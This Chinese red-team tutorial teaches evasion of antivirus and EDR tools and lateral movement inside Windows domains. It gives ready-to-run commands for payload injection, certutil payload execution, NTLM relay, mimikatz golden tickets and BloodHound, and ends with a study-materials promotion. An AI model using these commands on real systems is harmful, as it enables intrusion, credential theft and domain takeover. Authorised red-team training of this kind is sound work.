
护网红队要突破蓝队的多重防御,不仅需要熟练使用工具,更要掌握免杀改造、隐蔽横向移动等进阶技巧。本文聚焦红队攻击的 “两大关键环节”—— 免杀 Payload 生成与内网横向移动,拆解 5 类实战技术与操作步骤。
一、免杀技术:突破 EDR 与杀毒软件
1. 代码混淆免杀
-
核心原理:对 Payload 进行字符串加密、代码逻辑打乱,规避杀毒软件的特征检测。
-
实战操作:使用
ConfuserEx工具对 C# 编写的远控程序进行混淆,勾选 “字符串加密”“控制流混淆” 选项,生成免杀样本。 -
效果:可绕过 360、火绒等主流终端防护软件的静态检测。
2. 无文件攻击免杀
-
核心原理:不落地恶意文件,通过内存注入、PowerShell 脚本执行等方式运行 Payload。
-
实战操作:利用
Invoke-ReflectivePEInjection脚本,将 Metasploit 生成的 PE 文件注入notepad.exe进程,命令:
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath .\payload.exe -ProcessName notepad.exe
3. 合法工具滥用(LOLBAS)
-
核心原理:利用系统自带的合法工具(如
certutil.exe、mshta.exe)执行恶意代码,规避检测。 -
实战操作:通过
certutil.exe解码并执行 Base64 编码的恶意脚本:
certutil -decode payload.b64 payload.exe && payload.exe
二、横向移动:内网渗透的核心技巧
1. NTLM 中继攻击
-
工具:
Responder+ntlmrelayx.py -
实战步骤:
-
用
Responder监听网络,捕获目标的 NTLM 哈希:responder -I eth0 -rdw -
将哈希中继至域控的 LDAP 服务:
ntlmrelayx.py`` -t ldap://``dc.xxx.com`` -smb2support
- 防御对抗:攻击前先扫描目标是否启用 SMB 签名,未启用则可成功中继。
2. 黄金票据(Golden Ticket)攻击
-
前提:获取域控制器的 KRBTGT 账户哈希。
-
实战步骤:使用
mimikatz生成黄金票据,绕过身份验证登录域内任意主机:
mimikatz # kerberos::golden /domain:xxx.com /sid:S-1-5-21-xxx /krbtgt:xxx /user:admin /ticket:golden.kirbi
mimikatz # kerberos::ptt golden.kirbi
3. BloodHound 攻击路径挖掘
-
核心作用:可视化域内权限关系,快速找到 “普通用户→域管理员” 的最短攻击链。
-
实战步骤:
-
执行
SharpHound.exe -CollectionMethod All收集域内数据。 -
将数据导入 Neo4j 数据库,通过 BloodHound 界面分析信任关系和权限漏洞。
红队技术的核心是 “隐蔽性”,免杀确保初始 foothold 不被发现,横向移动技巧则帮助快速拿下核心目标。若需免杀工具的详细配置教程,可随时告知~
互动话题:如果你想学习更多
**护网方面**的知识和工具,可以看看以下面!
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。




因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传优快云,朋友们如果需要可以在下方优快云官方认证二维码免费领取【保证100%免费】

911

被折叠的 条评论
为什么被折叠?



